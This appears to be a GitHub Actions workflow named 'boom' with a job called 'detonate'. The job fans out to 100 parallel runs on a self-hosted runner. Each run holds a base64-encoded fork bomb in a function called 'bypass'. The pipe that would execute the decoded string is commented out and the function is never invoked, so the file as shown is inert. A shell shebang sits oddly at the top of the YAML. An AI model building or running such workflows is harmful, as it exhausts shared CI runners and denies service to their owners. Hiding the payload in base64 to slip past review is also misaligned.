#!/bin/sh
# shellcheck disable=all

name: 'boom'

on:
  workflow_dispatch:

jobs:
  detonate:
    runs-on: 'self-hosted-autopush'

    strategy:
      max-parallel: 10000
      fail-fast: false

      matrix:
        axis_a: [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
        axis_b: [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]

    steps:
      - name: 'boom'
        shell: 'bash'
        run: |
          PAYLOAD="OjooeyA6fDogfTs6Cg=="
          function bypass() {
            echo "$PAYLOAD" | base64 --decode # | bash
          }
